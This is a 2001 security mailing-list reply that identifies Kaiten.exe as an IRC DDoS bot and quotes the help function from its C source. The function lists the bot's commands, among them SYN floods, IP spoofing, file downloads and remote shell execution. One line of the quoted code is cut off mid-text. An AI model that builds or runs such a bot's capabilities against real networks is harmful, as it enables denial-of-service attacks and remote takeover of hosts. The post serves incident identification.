Security Incidents mailing list archives

Re: Kaiten.exe DoS ?

From: Frijole <frijole () CLAS NET>
Date: Mon, 7 May 2001 15:46:15 -0500

this appears to be a ddos tool for irc. from kaiten.c help function
(http://packetstorm.securify.com/DoS/kaiten.c):

void help(int sock, char *sender, int argc, char **argv) {
 if (mfork() != 0) return;
 Send(sock,"NOTICE %s :GET <http address> <save as>                     =
Downloads a file off the web and saves it onto the hd\n",sender); sleep(2);
 Send(sock,"NOTICE %s :TSUNAMI <target> <secs>                          =
Special packeter that wont be blocked by most firewalls\n",sender);
sleep(2);
 Send(sock,"NOTICE %s :NICK <nick>                                      =
Changes the nick of the knight\n",sender); sleep(2);
 Send(sock,"NOTICE %s :GETSPOOF                                         =
Gets the current spoofing\n",sender); sleep(2);
 Send(sock,"NOTICE %s :PAN <target> <secs>                              = An
advanced syn flooder that will kill most network drivers\n",sender);
sleep(2);
special++ exploit\n",sender); sleep(2);
 Send(sock,"NOTICE %s :SPOOFS <subnet>                                  =
Changes spoofing to a subnet\n",sender); sleep(2);
 Send(sock,"NOTICE %s :DNS <host>                                       =
DNSs a host\n",sender); sleep(2);
 Send(sock,"NOTICE %s :CHECKSUM <on/off>                                =
Turns checksum on or off\n",sender); sleep(2);
 Send(sock,"NOTICE %s :IRC <command>                                    =
Sends this command to the server\n",sender); sleep(2);
 Send(sock,"NOTICE %s :SH <command>                                     =
Executes a command\n",sender); sleep(2);
 Send(sock,"NOTICE %s :KILLALL                                          =
Kills all current packeting\n",sender); sleep(2);
 Send(sock,"NOTICE %s :KILL                                             =
Kills the knight\n",sender); sleep(2);
 Send(sock,"NOTICE %s :DISABLE                                          =
Disables all packeting from this knight\n",sender); sleep(2);
 Send(sock,"NOTICE %s :ENABLE                                           =
Enables all packeting from this knight\n",sender); sleep(2);
 Send(sock,"NOTICE %s :VERSION                                          =
Requests version of knight\n",sender); sleep(2);
 Send(sock,"NOTICE %s :HELP                                             =
Displays this\n",sender);
 exit(0);
}

Youn Gonzales